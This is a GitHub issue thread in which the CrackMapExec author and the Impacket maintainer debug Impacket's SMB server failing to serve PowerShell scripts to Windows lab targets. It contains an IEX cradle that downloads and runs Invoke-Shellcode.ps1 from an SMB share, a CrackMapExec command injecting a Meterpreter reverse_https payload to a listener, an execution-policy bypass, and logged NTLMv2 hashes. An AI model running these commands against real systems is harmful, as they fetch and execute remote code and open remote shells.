smbserver: Connection reset by peer && command not implemented

[byt3bl33d3r]

Hey man!

I'm currently trying to download powershell scripts over smb on Windows 10 using the following command:

IEX (New-Object Net.WebClient).DownloadString("file://172.16.112.1/TMP/Invoke-Shellcode.ps1");

smbserver.py and my custom smb server class give me the following output:

2015-10-31 18:54:11 Config file parsed
2015-10-31 18:54:11 Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
2015-10-31 18:54:11 Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
2015-10-31 18:54:17 Incoming connection (172.16.112.130,51854)
2015-10-31 18:54:17 Not implemented command: 0x0
2015-10-31 18:54:17 Handle: [Errno 104] Connection reset by peer
2015-10-31 18:54:17 Closing down connection (172.16.112.130,51854)

Let me know if you need some additional information.

Cheers

[asolino]

hey mate..

Let me know if you need some additional information.

A pcap capture of the SMB Session would be awesome.

Does it fail with SMBv2 / v1 or both?

thanks

[byt3bl33d3r]

with SMBv1:

#~ sudo smbserver.py -debug TMP hosted 
Impacket v0.9.14-dev - Copyright 2002-2015 Core Security Technologies

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (172.16.112.130,52289)
[+] Not implemented command: 0x0
[*] Handle: [Errno 104] Connection reset by peer
[*] Closing down connection (172.16.112.130,52289)
[*] Remaining connections []

With SMBv2 it seems to work:

#~ sudo smbserver.py -debug -smb2support TMP hosted    
Impacket v0.9.14-dev - Copyright 2002-2015 Core Security Technologies

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (172.16.112.130,52291)
[*] AUTHENTICATE_MESSAGE (DESKTOP-2KI1H76\adrugdealer,DESKTOP-2KI1H76)
[*] User adrugdealer\DESKTOP-2KI1H76 authenticated successfully
[*] adrugdealer::DESKTOP-2KI1H76:4141414141414141:0508f44dde9d9d68380ff762c4380262:010100000000000000a2d5114414d101a7bbb1b9cfc490cf00000000010010007a006e006a00650071004d006800690002001000630075004d00460068005a0048005700030010007a006e006a00650071004d006800690004001000630075004d00460068005a00480057000700080000a2d5114414d10106000400020000000800300030000000000000000100000000200000ffe2a86b5f17cb85c168e7b5cc80bcbc2f530e89c8d51491ea7e3200fe46a4590a001000000000000000000000000000000000000900220063006900660073002f003100370032002e00310036002e003100310032002e003100000000000000000000000000
[*] Connecting Share(1:tmp)

But it fails:

PS C:\Users\adrugdealer> IEX (New-Object Net.WebClient).DownloadString("file://172.16.112.1/TMP/Invoke-Shellcode.ps1");
Exception calling "DownloadString" with "1" argument(s): "The specified server cannot perform the requested operation.
"
At line:1 char:1
+ IEX (New-Object Net.WebClient).DownloadString("file://172.16.112.1/TM ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : WebException

PCAP of SMBv1:
https://mega.nz/#!CJgxQJTb!IIomiaPXPjKBkbz7xLz6ErI8tNagO5j4ty2-RJTJQVg

PCAP of SMBv2:
https://mega.nz/#!XEIxjYJT!ZnjC8s1xWkwsBcQ7XwkHxGinww_QzFMTkpdi8eoopto

[byt3bl33d3r]

Didn't mean to close :/

[asolino]

Hmm.. I still can't reproduce.

The PCAP for SMBv1 only shows the target system trying to connect to your smbserver using SMBv2. That's because you might have connected using SMBv2 before, and the target knows and cached you talk SMBv2 (and not SMBv1) hence it doesn't negotiate the protocol version again. In order to fix that you will need to boot the target in between tests (or revert snapshot)

The PCAP for SMBv2 shows the file was opened but then when asking for file information, the object cannot be found. That is strange, and I couldn't reproduce in here. What I did was:

The target is a Windows 10.
The Host machine IP is: 172.16.123.1

1. Created a file called Invoke-Shellcode.ps1 containing a single line and placed it in /tmp:

Write-Host “Hey there, I'm working"

2. The I ran smbserver.py  this way:
   For SMBv1

./smbserver.py tmp /tmp

For SMBv2

./smbserver.py -smb2support tmp /tmp

3. In the target, I created a file test.ps1 containing:

IEX (New-Object Net.WebClient).DownloadString("file://172.16.123.1/TMP/Invoke-Shellcode.ps1");

4. At the target, I ran:

powershell -exec bypass -file test.ps1

The result is I get the Hey there, I'm working string back.

Do you get the same errors following these steps?

If so (and that's the intention), we will need to dig deeper on the OS config side. Anything in particular set up on that Win 10?
I can put some extra debugging data in smbserver.py to help understanding the problem. I'd love to be able to reproduce it myself tho.

thanks dude.

[byt3bl33d3r]

I rebooted the VM and the original error didn't happen anymore so that was a problem with the SMBv1/v2 caching.
Now for some reason with smbserver.py it works fine but when I use my custom smbserver class all I get is:

2015-11-01 19:45:01 Config file parsed
2015-11-01 19:45:01 Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
2015-11-01 19:45:01 Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
2015-11-01 19:45:03 Incoming connection (192.168.1.15,51451)
2015-11-01 19:45:03 AUTHENTICATE_MESSAGE (\,WIN-MNID1A21FST)
2015-11-01 19:45:03 User \WIN-MNID1A21FST authenticated successfully
2015-11-01 19:45:03 :::00::

and the PS script is never downloaded

If you want to take a look at the smbserver class its here:
https://github.com/byt3bl33d3r/CrackMapExec/blob/master/crackmapexec.py#L273

Also you could just test it yourself by running:

sudo python crackmapexec.py --verbose -t 100 192.168.1.15 -u Administrator -p password --force-ps32 --server smb --inject met_reverse_https --met-options 192.168.1.9 5656

[asolino]

First try using SMBv1. I think you forgot to tell the DCERPC SRVSVC the list of shares you have. Here's the diff:

diff --git a/crackmapexec.py b/crackmapexec.py
index 87e9a6f..30a6375 100755
--- a/crackmapexec.py
+++ b/crackmapexec.py
@@ -283,7 +283,7 @@ class SMBserver:
         self.smbConfig.set('global','rpc_apis','yes')
         self.smbConfig.set('global','credentials_file',str(''))
         self.smbConfig.set('global', 'challenge', str(''))
-        self.smbConfig.set("global", 'SMB2Support', 'True')
+        self.smbConfig.set("global", 'SMB2Support', 'False')

         # IPC always needed
         self.smbConfig.add_section('IPC$')
@@ -318,6 +318,8 @@ class SMBserver:
         self.wkstServer.daemon = True
         self.server.registerNamedPipe('srvsvc',('127.0.0.1',self.srvsServer.getListenPort()))
         self.server.registerNamedPipe('wkssvc',('127.0.0.1',self.wkstServer.getListenPort()))
+        self.srvsServer.setServerConfig(self.smbConfig)
+        self.srvsServer.processConfigFile()

     def serve_forever(self):
         self.srvsServer.start()

Check if with these changes everything works fine.

If you enable SMB2, there will be an error due to this line

self.smbConfig.set('TMP','path', 'hosted')

Looks like SMBv2 does not support specifying a share as a relative path. That's a bug that should be fixed in the SMBv2 code.

[byt3bl33d3r]

Applied the diff and still the same, took a look at the traffic and it seems like the server is having a hard time reading the requested file (don't quote me on that).

Here is the pcap: https://mega.nz/#!mFQlgTLD!wkrxX-6YPGTuHQEKJNPFJ_nELto1Hp_fv73AxvTzLGM

[asolino]

Anything written out at the console? Any error?

What are you doing at the target's? what about, from cmd.exe:

net view \\172.16.183.1
start \\172.16.183.1
copy \\172.16.183.1\tmp\Invoke-Shellcode.ps1

[asolino]

Just in case also, git pull impacket to the latest version.

[byt3bl33d3r]

On the latest commit:

• net view \\172.16.183.1 just hangs, no output is given.
• start \\172.16.183.1 works fine.
• copy \\172.16.183.1\tmp\Invoke-Shellcode.ps1 hangs and gives the following output on the server:

2015-11-02 10:07:39 Incoming connection (172.16.183.138,51593)
2015-11-02 10:07:39 AUTHENTICATE_MESSAGE (WIN-MNID1A21FST\byt3bl33d3r,WIN-MNID1A21FST)
2015-11-02 10:07:39 User byt3bl33d3r\WIN-MNID1A21FST authenticated successfully
2015-11-02 10:07:39 byt3bl33d3r::WIN-MNID1A21FST:4141414141414141:5bc5923d1ddcb62d3a367b5febc4f6dc:010100000000000080ff57fa9015d1015f0df0ca2e980eed000000000100100047006a0057004f006f004a0043006d00020010006b00760059005600490069006d0057000300100047006a0057004f006f004a0043006d00040010006b00760059005600490069006d0057000700080080ff57fa9015d10106000400020000000800300030000000000000000100000000200000aaab615cb5e7b569477012a75b8a6c32ab924048f37e9373fa99218179054b8d0a001000000000000000000000000000000000000900220063006900660073002f003100370032002e00310036002e003100380033002e003100000000000000000000000000
2015-11-02 10:07:39 Unknown level for query path info! 0x109

And when using an IEX cradle keep getting this:

2015-11-02 10:02:57 Config file parsed
2015-11-02 10:02:57 Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
2015-11-02 10:02:57 Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
2015-11-02 10:02:58 Incoming connection (172.16.183.138,51587)
2015-11-02 10:02:58 AUTHENTICATE_MESSAGE (\,WIN-MNID1A21FST)
2015-11-02 10:02:58 User \WIN-MNID1A21FST authenticated successfully
2015-11-02 10:02:58 :::00::4141414141414141
2015-11-02 10:04:19 Handle: [Errno 104] Connection reset by peer
2015-11-02 10:04:19 Closing down connection (172.16.183.138,51587)
2015-11-02 10:04:19 Remaining connections []

[byt3bl33d3r]

@asolino net view works now

[byt3bl33d3r]

it's really weird cause everything works as expected when using smbserver.py

[asolino]

Well it's really weird because it's working on my side even using crackmapexec running it this way (different IPs/pwds):

sudo python crackmapexec.py --verbose -t 100 192.168.1.15 -u Administrator -p password --force-ps32 --server smb --inject met_reverse_https --met-options 192.168.1.9 5656

I can browse the TMP share, download the files, and use the IEX stuff.

Is it working on other OSes?

[byt3bl33d3r]

wut? ahah

what OSes are you using? Atm I'm running Debian and I'm currently using Windows 7 as the target.

[asolino]

You mentioned Windows 10 at the beginning of this issue. That's what I'm using.

crackmapexec.py is running on OSx.

Looks like it's not related to Windows 10 then.

Why don't you use the SimpleSMBServer class?. Look at https://github.com/CoreSecurity/impacket/blob/master/examples/smbserver.py#L55

[byt3bl33d3r]

@asolino Already tried SimpleSMBServer, same result. Will try again with the latest commit just to make sure

[byt3bl33d3r]

Just tried using SimpleSMBServer and nothing changes. At this point I'm thinking it might be a Linux issue (??) since it works for you on OSX

[asolino]

Just ran crackmapexec from a Kali box and it worked, again!

[byt3bl33d3r]

@asolino ok, its gotta be my system then. closing. Sorry for the trouble mate